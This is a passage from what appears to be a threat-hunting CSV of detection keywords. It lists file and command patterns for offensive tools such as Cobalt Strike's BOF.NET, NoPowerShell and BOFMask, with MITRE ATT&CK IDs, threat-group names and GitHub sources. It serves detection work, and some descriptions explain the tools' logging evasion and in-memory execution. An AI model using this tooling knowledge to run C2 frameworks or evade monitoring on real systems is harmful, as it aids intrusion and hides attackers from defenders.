- T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","1","N/A","10","10","145","25","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z"
+"*BOFMask-main*","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","10","1","94","24","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z"
+"*bofnet*SeriousSam.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z"
+"*BOFNET.Bofs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z"
+"*bofnet.cna*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet.cna*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*BOFNET.csproj*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*BOFNET.dll*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*BOFNET.dll*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*BOFNET.sln*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet_boo *.boo*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet_execute *","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet_execute *","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*bofnet_execute.*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik 
Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*bofnet_execute.*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet_execute.cpp.x64.obj*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*bofnet_execute.cpp.x86.obj*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*bofnet_init*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 
- Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet_job *","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet_jobkill*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet_jobs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet_jobstatus 
*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet_list*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet_listassembiles*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*bofnet_load *","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. 
No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*bofnet_load *.*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 